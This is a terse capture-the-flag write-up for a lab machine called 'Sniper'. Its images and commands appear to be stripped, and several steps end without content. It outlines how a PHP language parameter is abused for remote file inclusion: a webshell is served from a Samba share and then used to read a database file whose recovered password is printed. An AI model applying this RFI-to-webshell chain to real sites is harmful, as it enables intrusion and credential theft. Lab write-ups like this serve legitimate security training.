🔫Sniper
First we start by an nmap :
I first go on the webpage, and find a nice interface with sub categories:
then click on the user interface that seemed the only legit page on the homepage:
decided to create a user Felix/Felix:
and when trying to log in:
So I start to wonder if the other pages weren't fake rabbit holes:
In the "our service" page, we find a dropdown menu for the languages linked to a php file that could lead to RFI
If we try and go fetch a file in a subdirectory:
We can now try to gain foothold via a smb share
Create a Webshell with Remote File Inclusion
Configure the proper permissions.
configured the smb.conf
file in the location /etc/samba/smb.conf
restart the Samba service to get the changes effective.
ast part is preparing a payload that can be called by the webserver. I downloaded the script mannu.php
and placed it in box.php
in the location /var/www/html/
And if i request the following url with the RFI:
In the ../user/db.php
file, if we click the edit button, we can see some very interesting stuff:
so we got some credentials for dbuser (36mEAhz/B8xQ~2VM)
Last updated